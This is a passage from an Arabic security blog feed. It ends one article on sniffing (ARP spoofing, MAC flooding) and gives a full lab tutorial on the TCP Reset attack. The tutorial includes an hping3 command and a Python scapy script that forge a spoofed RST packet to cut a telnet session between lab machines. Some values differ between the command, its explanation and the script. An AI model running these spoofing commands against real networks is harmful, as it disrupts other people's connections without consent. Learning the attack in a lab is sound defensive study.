&lt;li&gt;&lt;strong&gt;Switched Ethernet:&lt;/strong&gt; في هذه البيئة يتم وصل الأجهزة عبر جهاز سويتش والذي يعمل بالاعتماد على تحديد عناوين MAC لكل جهاز مع رقم المنفذ المتصل من خلاله ليتم تسليم الفريمات فقط للجهاز الهدف وهنا لا يتم إرسال البيانات لكل الأجهزة وهذا يساعد على توفير عرض الحزمة bandwidth ويزيد من مستوى الحماية وفي حال تم ضبط كرت الشبكة ليعمل بنمط promiscuous mode للعمل على جمع وإلتقاط حزم البيانات فإنه لن يتمكن من القيام بذلك ولهذا السبب فإن بعض الأشخاص يعتقدوا بإن بنية الشبكات المعتمدة على أجهزة السويتش هي آمنة ضد آليات إلتقاط حزم البيانات ولكن هذا الاعتقاد غير صحيح.&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;يمكننا القول أن السويتش أكثر أماناً من جهاز ال hub&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;ARP Spoofing:&lt;/strong&gt; هذا البرتوكول يعتبر stateless ويمكن لأي جهاز أن يرسل ARP reply حتى ولو أنه لم يتلقى طلب لذلك وهنا يمكن للمهاجم أن ينتحل شخصية الراوتر أو البوابة الافتراضية gateway للشبكة من خلال ARP spoofing وعندها فإن ARP cache في الجهاز الهدف سوف يحوي على مدخلات غير صحيحة بخصوص البوابة الافتراضية gateway للشبكة وكل حركة البيانات التي يجب أن تصل إلى gateway (الراوتر) ستمر عبر جهاز المهاجم الذي قام بانتحال gateway MAC&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;MAC Flooding:&lt;/strong&gt; جهاز السويتش يعتمد في عمله على جدول يربط من خلاله عناوين MAC للأجهزة مع أرقام المنافذ المتصلة بها ولكن الذاكرة الخاصة بالسويتش محدودة وإغراق هذا الجدول بعناوين MAC مزورة سيؤدي إلى محدودية عمل الجهاز وسيتحول لنمط العمل fail-open mode وسيعمل بشكل مشابه لجهاز hub وسيقوم بإرسال البيانات بشكل broadcast عبر كل المنافذ وهذا مناسب جداً للمهاجم الذي يرغب بإلتقاط البيانات عبر الشبكة&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;بشكل افتراضي فإن نمط promiscuous mode يكون غير فعال ضمن الأجهزة وعندها فإن كروت الشبكة ستقبل فقط حزم البيانات المخصصة لها وتتجاهل الباقي أما المهاجم فسيقوم بإعداد كرت الشبكة بجهازه للعمل بهذا النمط ليتمكن من الحصول على كامل حركة البيانات عبر الشبكة&lt;/p&gt;
</content:encoded><category>اختبار الاختراق</category><category>Network Sniffing</category><category>التقاط الحزم</category><category>ARP Spoofing</category><category>MAC Flooding</category><category>promiscuous mode</category></item><item><title>TCP Reset Attack الهجوم بلغة البايثون</title><link>https://blog.cyberpedia.site/tcp-reset-attack/</link><guid isPermaLink="true">https://blog.cyberpedia.site/tcp-reset-attack/</guid><description>شرح هجوم TCP Reset: كيف يقطع المهاجم اتصال TCP بإرسال حزمة RST مزورة، مع أساسيات البروتوكول وتنفيذ الهجوم بأداة hping3 وبلغة بايثون.</description><pubDate>Tue, 30 Nov 2021 11:40:05 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;هجوم TCP Reset يقطع اتصالاً قائماً بين جهازين بإرسال حزمة TCP مزوّرة تحمل علم RST بأرقام تسلسل صحيحة، فيظن الطرفان أنها شرعية ويُنهيان الاتصال. يوضح المقال أساسيات بروتوكول TCP والمصافحة الثلاثية، ثم ينفّذ الهجوم عملياً عبر أداة hping3 وبسكربت بايثون باستخدام مكتبة scapy.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;هذا الهجوم يتم من خلال خلق و إرسال حزمة بيانات واحدة مزورة spoofed TCP segment لخداع هدفين متصلين باستخدام TCP لقطع الاتصال القائم بينهما&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;مخطط هجوم TCP Reset: المهاجم يرسل حزمة RST مزوّرة لقطع اتصال TCP القائم بين الجهازين A وB&quot; width=&quot;1600&quot; height=&quot;940&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-01.A2vClWn3_1nL126.webp&quot;&gt;&lt;/p&gt;
&lt;p&gt;كان لهذا الهجوم عواقب في العالم الحقيقي وتسبب بالخوف من اجراء تغييرات على البرتوكول TCP ويعتقد أن هذا الهجوم هو عنصر رئيسي في جدار الحماية الصيني العظيم الذي تستخدمه الحكومة الصينية لفرض رقابة على الانترنت داخل الصين  بالرغم من أهمية هذا الهجوم ولكنه لا يتطلب فهم عميق للشبكات أو لآلية عمل البرتوكول TCP&lt;/p&gt;
&lt;p&gt;في هذا المقال سنتعرف على اساسيات البرتوكول TCP وسنتعرف على آلية عمل الهجوم TCP Reset Attack وسنقوم بتنفيذ هذا الهجوم بطريقتين:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;الأولى من خلال خلق حزمة بيانات باستخدام أداة hping3&lt;/li&gt;
&lt;li&gt;الثانية من خلال كتابة كود بايثون لينفذ هذه المهمة&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;كيف-يتم-هجوم-tcp-reset-attack&quot;&gt;كيف يتم هجوم TCP Reset Attack&lt;/h2&gt;
&lt;p&gt;يقوم المهاجم بقطع الاتصال بين جهازي ضحية من خلال إرسال رسالة مزورة لاحدهما أو كلاهما ومحتوى هذه الرسالة هو طلب قطع الاتصال بشكل مباشر وهذه الرسالة هي TCP reset segment&lt;/p&gt;
&lt;p&gt;في الحالات الطبيعية ترسل هذه الرسالة عندما يتلقى الجهاز حركة بيانات غير متوقعة ويريد من مرسلها التوقف عن عملية الارسال وهذا الهجوم يتم من خلال استغلال هذه الآلية لخداع الضحايا لإغلاق اتصال TCP بعد تلقي حزمة بيانات مزورة fake reset segment وإذا تم ضبط القيم الخاصة بهذه الحزمة بشكل صحيح من قبل المهاجم فإن الجهاز الضحية سيدرك أن هذه البيانات هي صحيحة وسيقوم بقطع الاتصال ومنعه من تبادل المزيد من المعلومات، يمكن للضحايا إنشاء اتصال TCP جديد كمحاولة لاستئناف الاتصال السابق ولكن يمكن للمهاجم أيضاً قطع هذه الاتصال مرة أخرى ولكون هذا الهجوم يتطلب من المهاجم إعداد وخلق الحزمة المزورة فهذا الهجوم يكون فعال فقط ضد عمليات الاتصال الطويلة لأن الاتصالات القصيرة ستكون قد انتهت في الوقت الذي يحاول فيه المهاجم خلق الحزمة المزورة&lt;/p&gt;
&lt;p&gt;إرسال حزمة مزورة spoofed TCP segment هو أمر سهل جداً كون آلية عمل كل من البرتوكول TCP والبرتوكول IP لا يتم من خلالهم التحقق من هوية المستخدم (يوجد إضافة لبرتوكول IP تؤمن عملية المصادقة تسمى IPSec سنتعرف عليها في مقال قادم ولكنها غير مستخدمة على نطاق واسع) من المفترض أن يرفض مزود خدمة الانترنت نقل حزم البيانات التي تدعي أنها جاءت من عنوان IP منتحل ولكن هذا التحقق غير مطبق بشكل كامل&lt;/p&gt;
&lt;p&gt;كل ما يمكن للمستقبل القيام به هو أخذ عنوان IP ورقم البورت للمصدر من داخل حزمة البيانات ومحاولة التحقق من هوية المرسل من خلال برتوكولات الطبقات الأعلى ولكون TCP reset هي جزء من البرتوكول TCP نفسه فلا يمكن التحقق من صحتها باستخدام هذه البرتوكولات&lt;/p&gt;
&lt;p&gt;على الرغم من سهولة هذا الهجوم ولكن من الأفضل أن نقوم أولاً بفهم آلية عمل البرتوكول TCP&lt;/p&gt;
&lt;h2 id=&quot;tcp-protocol&quot;&gt;TCP Protocol&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Transmission Control Protocol&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;البرتوكول المسؤول عن عملية الاتصال ويعمل في الطبقة الرابعة Transport Layer وعملية الاتصال تبدأ من خلال المصافحة الثلاثية Three-way Handshake ويتم التأكد من وصول البيانات المرسلة لذلك يتم استخدامه في التطبيقات التي تقوم بإرسال بيانات مهمة مثل: HTTP and FTP&lt;/p&gt;
&lt;p&gt;TCP يعرف باسم برتوكول الاتصال الموجه Connection Oriented وهو يقوم بتأسيس الاتصال ومن ثم يتأكد من وصول حزم البيانات المرسلة إلى المستقبل.&lt;/p&gt;
&lt;p&gt;عملية الاتصال تبدأ بإرسال SYN Packet والتي هي بداية لعملية المصافحة الثلاثية والتي تخبر المستقبل بأن المرسل يريد تأسيس اتصال TCP، المستقبل يرد بإرسال SYN-ACK  كإعلام على أنه استلم طلب SYN وعندما تصل الإجابة SYN-ACK إلى المرسل يقوم بإرسال ACK كإعلام على أنه تلقى الإجابة وعندها تبدأ عملية الاتصال عبر برتوكول TCP&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;الشكل&lt;/strong&gt; &lt;strong&gt;التالي&lt;/strong&gt; &lt;strong&gt;يظهر&lt;/strong&gt; &lt;strong&gt;عملية&lt;/strong&gt; &lt;strong&gt;المصافحة&lt;/strong&gt; &lt;strong&gt;الثلاثية&lt;/strong&gt;:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;TCP three-way handshake&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;مخطط المصافحة الثلاثية في بروتوكول TCP: إرسال SYN ثم الرد بـSYN-ACK ثم تأكيد ACK بين النظامين&quot; width=&quot;1600&quot; height=&quot;900&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-02.CR3UG4Qx_ZG2aMA.webp&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;التقاط المصافحة الثلاثية في Wireshark:&lt;/em&gt;&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Source&lt;/th&gt;
&lt;th&gt;Destination&lt;/th&gt;
&lt;th&gt;Protocol&lt;/th&gt;
&lt;th&gt;Length&lt;/th&gt;
&lt;th&gt;Info&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;192.168.200.128&lt;/td&gt;
&lt;td&gt;192.168.100.128&lt;/td&gt;
&lt;td&gt;TCP&lt;/td&gt;
&lt;td&gt;74&lt;/td&gt;
&lt;td&gt;39944 → 80 [SYN] Seq=0 Win=29200&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;192.168.100.128&lt;/td&gt;
&lt;td&gt;192.168.200.128&lt;/td&gt;
&lt;td&gt;TCP&lt;/td&gt;
&lt;td&gt;60&lt;/td&gt;
&lt;td&gt;80 → 39944 [SYN, ACK] Seq=0 Ack=1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;192.168.200.128&lt;/td&gt;
&lt;td&gt;192.168.100.128&lt;/td&gt;
&lt;td&gt;TCP&lt;/td&gt;
&lt;td&gt;54&lt;/td&gt;
&lt;td&gt;39944 → 80 [ACK] Seq=1 Ack=1&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;حزم TCP Packet ترقم بشكل تسلسلي ويجب أن تفهم آلية الترقيم لاستخدامها في مثل هذا النوع من الهجمات أو هجمات سرقة الجلسة Session Hijacking وهجمات رجل في المنتصف MITM – Man in the Middle&lt;/p&gt;
&lt;p&gt;رسالة TCP تسمى Segment وتتألف من البيانات المرسلة والترويسة Header&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;الشكل التالي يظهر مكونات TCP Header:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;img alt=&quot;مخطط ترويسة TCP Header وحقولها: المنافذ وأرقام التسلسل والإقرار وبتات التحكم وحجم النافذة والتحقق&quot; width=&quot;1600&quot; height=&quot;1005&quot; src=&quot;https://blog.cyberpedia.site/_astro/img-04.CNUoMInb_Z2qCx41.webp&quot;&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Source Port and Destination Port&lt;/strong&gt;:&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;لها طول 16 bits وتحوي على رقم المنفذ الذي تم إرسال البيانات عبره ورقم المنفذ الذي سيتم استقبال البيانات من خلاله.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Sequence Number (32 bits):&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;تحوي على الرقم التسلسلي لأول Byte من البيانات في Segment ويستخدم لتحديد المكان أو الترتيب الصحيح لحزم البيانات.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Acknowledgment Number (32 bits):&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;تحوي على الرقم التسلسلي الخاص بالمرسل (تم زيادته بمقدار واحد)&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;H.Len (4 bits):&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;حجم الترويسة&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Rsvd:&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;محجوزة لاستخدام مستقبلي.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Control Bits (Control Flags):&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;تحوي على احدى الأعلام التالية:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;SYN:&lt;/strong&gt; للدلالة على المزامنة وله رقم تسلسلي ويستخدم لبدء عملية الاتصال.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;ACK:&lt;/strong&gt; للدلالة على استلام الطلب.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;RST:&lt;/strong&gt; قطع الاتصال بشكل فوري.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;FIN:&lt;/strong&gt; للإشارة لانتهاء البيانات المرسلة وبالتالي انهاء عملية الاتصال.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;PSH:&lt;/strong&gt; للإشارة إلى ضرورة إرسال البيانات الموجودة في الذاكرة المؤقتة.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;URG:&lt;/strong&gt; للإشارة إلى أن البيانات المرسلة هي بيانات مستعجلة والمؤشر Urgent Pointer يحوي على الرقم التسلسلي لهذه البيانات.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;بيئة-الاختبار&quot;&gt;بيئة الاختبار&lt;/h2&gt;
&lt;p&gt;بيئة الاختبار مكونة من ثلاث أجهزة ضمن نفس الشبكة&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;جهاز المهاجم:&lt;/strong&gt; يعمل بنظام التشغيل كالي لينكس&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;جهاز الضحية الأول:&lt;/strong&gt; يعمل بنظام لينكس (metasploitable2)  وله عنوان IP: 192.168.17.129&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;جهاز الضحية الثاني:&lt;/strong&gt; يعمل بنظام Ubuntu وله العنوان IP: 192.168.17.135&lt;/li&gt;
&lt;/ol&gt;
&lt;h2 id=&quot;سيناريو-الهجوم&quot;&gt;سيناريو الهجوم&lt;/h2&gt;
&lt;p&gt;سنقوم بعملية اتصال telnet من خلال نظام Ubuntu IP:192.168.17.135   مع النظام metasploitable2 IP: 192.168.17.129 ومن ثم سنقوم بقطع هذا الاتصال من خلال ارسال حزمة بيانات مزورة Spoofed TCP Reset من قبل النظام كالي لينكس&lt;/p&gt;
&lt;pre tabindex=&quot;0&quot; data-language=&quot;bash&quot;&gt;&lt;code&gt;&lt;span&gt;&lt;span&gt;cyberfu@ubuntu:~$&lt;/span&gt;&lt;span&gt; telnet&lt;/span&gt;&lt;span&gt; 192.168.17.129&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;Trying&lt;/span&gt;&lt;span&gt; 192.168.17.129...&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;Connected&lt;/span&gt;&lt;span&gt; to&lt;/span&gt;&lt;span&gt; 192.168.17.129.&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;Escape&lt;/span&gt;&lt;span&gt; character&lt;/span&gt;&lt;span&gt; is&lt;/span&gt;&lt;span&gt; &apos;^]&apos;.&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;Warning:&lt;/span&gt;&lt;span&gt; Never&lt;/span&gt;&lt;span&gt; expose&lt;/span&gt;&lt;span&gt; this&lt;/span&gt;&lt;span&gt; VM&lt;/span&gt;&lt;span&gt; to&lt;/span&gt;&lt;span&gt; an&lt;/span&gt;&lt;span&gt; untrusted&lt;/span&gt;&lt;span&gt; network!&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;Login&lt;/span&gt;&lt;span&gt; with&lt;/span&gt;&lt;span&gt; msfadmin/msfadmin&lt;/span&gt;&lt;span&gt; to&lt;/span&gt;&lt;span&gt; get&lt;/span&gt;&lt;span&gt; started&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;metasploitable&lt;/span&gt;&lt;span&gt; login:&lt;/span&gt;&lt;span&gt; msfadmin&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;Password:&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;بعد نجاح عملية الاتصال لنقم بفتح wireshark في جهاز الهجوم (الكالي) ونقم بفلترة حزم البيانات باستخدام خيار الفلترة التالي:&lt;/p&gt;
&lt;pre tabindex=&quot;0&quot; data-language=&quot;text&quot;&gt;&lt;code&gt;&lt;span&gt;&lt;span&gt;ip.dst == 192.168.17.129 &amp;amp;&amp;amp; ip.src == 192.168.17.135&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;والذي سيقوم بعرض حركة البيانات من المصدر 192.168.17.135 إلى الوجهة 192.168.17.129 فقط&lt;/p&gt;
&lt;p&gt;&lt;em&gt;حركة البيانات بعد تطبيق الفلتر في Wireshark، ومنها نقرأ رقم التسلسل اللازم للهجوم (raw: 3979056369):&lt;/em&gt;&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Source&lt;/th&gt;
&lt;th&gt;Destination&lt;/th&gt;
&lt;th&gt;Protocol&lt;/th&gt;
&lt;th&gt;Info&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;192.168.17.135&lt;/td&gt;
&lt;td&gt;192.168.17.129&lt;/td&gt;
&lt;td&gt;TELNET&lt;/td&gt;
&lt;td&gt;Telnet Data …&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;192.168.17.135&lt;/td&gt;
&lt;td&gt;192.168.17.129&lt;/td&gt;
&lt;td&gt;TCP&lt;/td&gt;
&lt;td&gt;44914 → 23 [ACK] Seq=187 Ack=10194&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;192.168.17.135&lt;/td&gt;
&lt;td&gt;192.168.17.129&lt;/td&gt;
&lt;td&gt;TCP&lt;/td&gt;
&lt;td&gt;44914 → 23 [RST] Seq=172 Win=65536&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;&lt;strong&gt;HPING3:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;هذه الأداة تسمح لنا بإرسال حزم بيانات عبر الشبكة وتسمح لنا بخلق الحزم المرسلة وتخصيصيها بحسب الغاية المطلوبة، لنقم بخلق حزمة بيانات مزورة من خلال التعليمة التالية:&lt;/p&gt;
&lt;pre tabindex=&quot;0&quot; data-language=&quot;bash&quot;&gt;&lt;code&gt;&lt;span&gt;&lt;span&gt;hping3&lt;/span&gt;&lt;span&gt; 192.168.17.129&lt;/span&gt;&lt;span&gt; -a&lt;/span&gt;&lt;span&gt; 192.168.17.135&lt;/span&gt;&lt;span&gt; -p&lt;/span&gt;&lt;span&gt; 23&lt;/span&gt;&lt;span&gt; -s&lt;/span&gt;&lt;span&gt; 44914&lt;/span&gt;&lt;span&gt; -R&lt;/span&gt;&lt;span&gt; -M&lt;/span&gt;&lt;span&gt; 3979056369&lt;/span&gt;&lt;span&gt; -c&lt;/span&gt;&lt;span&gt; 1&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;HPING&lt;/span&gt;&lt;span&gt; 192.168.17.129&lt;/span&gt;&lt;span&gt; (eth0 &lt;/span&gt;&lt;span&gt;192.168.17.129&lt;/span&gt;&lt;span&gt;): R set, 40 headers + 0 data bytes&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;---&lt;/span&gt;&lt;span&gt; 192.168.17.129&lt;/span&gt;&lt;span&gt; hping&lt;/span&gt;&lt;span&gt; statistic&lt;/span&gt;&lt;span&gt; ---&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;1&lt;/span&gt;&lt;span&gt; packets&lt;/span&gt;&lt;span&gt; transmitted,&lt;/span&gt;&lt;span&gt; 0&lt;/span&gt;&lt;span&gt; packets&lt;/span&gt;&lt;span&gt; received,&lt;/span&gt;&lt;span&gt; 100%&lt;/span&gt;&lt;span&gt; packet&lt;/span&gt;&lt;span&gt; loss&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;round-trip&lt;/span&gt;&lt;span&gt; min/avg/max&lt;/span&gt;&lt;span&gt; =&lt;/span&gt;&lt;span&gt; 0.0/0.0/0.0&lt;/span&gt;&lt;span&gt; ms&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;192.168.17.129:&lt;/strong&gt; عنوان الجهاز الذي سيتم ارسال حزمة البيانات له&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;a 192.168.17.138:&lt;/strong&gt; عنوان IP المنتحل spoofed IP – حزمة البيانات سيكون لها هذا العنوان كعنوان المصدر&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;p 23:&lt;/strong&gt; رقم البورت في الوجهة&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;s 44914:&lt;/strong&gt; رقم البورت في المصدر&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;R:&lt;/strong&gt; لخلق Reset Flag&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;M 3979056369:&lt;/strong&gt; رقم sequence number&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;c 1:&lt;/strong&gt; لإرسال حزمة بيانات واحدة&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote&gt;
&lt;p&gt;هذه القيم تم الحصول عليها من خلال wireshark&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;الآن وبعد إرسال هذه الحزمة سيتم قطع اتصال telnet بين الأجهزة الهدف&lt;/p&gt;
&lt;pre tabindex=&quot;0&quot; data-language=&quot;bash&quot;&gt;&lt;code&gt;&lt;span&gt;&lt;span&gt;msfadmin@metasploitable:~$&lt;/span&gt;&lt;span&gt; Connection&lt;/span&gt;&lt;span&gt; closed&lt;/span&gt;&lt;span&gt; by&lt;/span&gt;&lt;span&gt; foreign&lt;/span&gt;&lt;span&gt; host.&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;cyberfu@ubuntu:~$&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id=&quot;الهجوم-بلغة-البايثون&quot;&gt;الهجوم بلغة البايثون&lt;/h2&gt;
&lt;p&gt;لنقم بكتابة كود بايثون لتنفيذ هذا الهجوم&lt;/p&gt;
&lt;pre tabindex=&quot;0&quot; data-language=&quot;python&quot;&gt;&lt;code&gt;&lt;span&gt;&lt;span&gt;#!/usr/bin/python3&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;#TCP Reset Attack&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;#Import Scapy&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;import&lt;/span&gt;&lt;span&gt; sys&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;from&lt;/span&gt;&lt;span&gt; scapy.all &lt;/span&gt;&lt;span&gt;import&lt;/span&gt;&lt;span&gt; *&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;print&lt;/span&gt;&lt;span&gt;(&lt;/span&gt;&lt;span&gt;&quot;SENDING RESET PACKET.........&quot;&lt;/span&gt;&lt;span&gt;)&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;#Spoofing IP&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;IPLayer &lt;/span&gt;&lt;span&gt;=&lt;/span&gt;&lt;span&gt; IP(&lt;/span&gt;&lt;span&gt;src&lt;/span&gt;&lt;span&gt;=&lt;/span&gt;&lt;span&gt;&quot;192.168.17.135&quot;&lt;/span&gt;&lt;span&gt;, &lt;/span&gt;&lt;span&gt;dst&lt;/span&gt;&lt;span&gt;=&lt;/span&gt;&lt;span&gt;&quot;192.168.17.129&quot;&lt;/span&gt;&lt;span&gt;)&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;#Create Spoofed TCP Reset Segment&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;TCPLayer &lt;/span&gt;&lt;span&gt;=&lt;/span&gt;&lt;span&gt; TCP(&lt;/span&gt;&lt;span&gt;sport&lt;/span&gt;&lt;span&gt;=&lt;/span&gt;&lt;span&gt;44962&lt;/span&gt;&lt;span&gt;, &lt;/span&gt;&lt;span&gt;dport&lt;/span&gt;&lt;span&gt;=&lt;/span&gt;&lt;span&gt;23&lt;/span&gt;&lt;span&gt;, &lt;/span&gt;&lt;span&gt;flags&lt;/span&gt;&lt;span&gt;=&lt;/span&gt;&lt;span&gt;&quot;R&quot;&lt;/span&gt;&lt;span&gt;, &lt;/span&gt;&lt;span&gt;seq&lt;/span&gt;&lt;span&gt;=&lt;/span&gt;&lt;span&gt;3467116117&lt;/span&gt;&lt;span&gt;)&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;pkt &lt;/span&gt;&lt;span&gt;=&lt;/span&gt;&lt;span&gt; IPLayer&lt;/span&gt;&lt;span&gt;/&lt;/span&gt;&lt;span&gt;TCPLayer&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;ls(pkt)&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;send(pkt, &lt;/span&gt;&lt;span&gt;verbose&lt;/span&gt;&lt;span&gt;=&lt;/span&gt;&lt;span&gt;0&lt;/span&gt;&lt;span&gt;)&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;#Cyber Fu&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;في البداية لنقم باستيراد scapy إن لم تكن منصبة لديك مسبقاً يمكنك تنصيبها باستخدام التعليمة التالية على نظام كالي لينكس&lt;/p&gt;
&lt;pre tabindex=&quot;0&quot; data-language=&quot;bash&quot;&gt;&lt;code&gt;&lt;span&gt;&lt;span&gt;apt-get&lt;/span&gt;&lt;span&gt; install&lt;/span&gt;&lt;span&gt; python3-scapy&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;Reading&lt;/span&gt;&lt;span&gt; package&lt;/span&gt;&lt;span&gt; lists...&lt;/span&gt;&lt;span&gt; Done&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;Building&lt;/span&gt;&lt;span&gt; dependency&lt;/span&gt;&lt;span&gt; tree...&lt;/span&gt;&lt;span&gt; Done&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;Reading&lt;/span&gt;&lt;span&gt; state&lt;/span&gt;&lt;span&gt; information...&lt;/span&gt;&lt;span&gt; Done&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;python3-scapy&lt;/span&gt;&lt;span&gt; is&lt;/span&gt;&lt;span&gt; already&lt;/span&gt;&lt;span&gt; the&lt;/span&gt;&lt;span&gt; newest&lt;/span&gt;&lt;span&gt; version&lt;/span&gt;&lt;span&gt; (2.4.4-4).&lt;/span&gt;&lt;/span&gt;
&lt;span&gt;&lt;span&gt;0&lt;/span&gt;&lt;span&gt; upgraded,&lt;/span&gt;&lt;span&gt; 0&lt;/span&gt;&lt;span&gt; newly&lt;/span&gt;&lt;span&gt; installed,&lt;/span&gt;&lt;span&gt; 0&lt;/span&gt;&lt;span&gt; to&lt;/span&gt;&lt;span&gt; remove&lt;/span&gt;&lt;span&gt; and&lt;/span&gt;&lt;span&gt; 843&lt;/span&gt;&lt;span&gt; not&lt;/span&gt;&lt;span&gt; upgraded.&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;ومن ثم قمنا بتحديد عناوين IP لكل من المصدر (عنوان منتحل) والوجهة وقمنا بتحديد رقم البورت في كل من المصدر والهدف وقمنا بتحديد رقم sequence number&lt;/p&gt;
&lt;p&gt;(هذه القيم حصلنا عليها من خلال تحليل حركة البيانات ضمن wireshark)&lt;/p&gt;
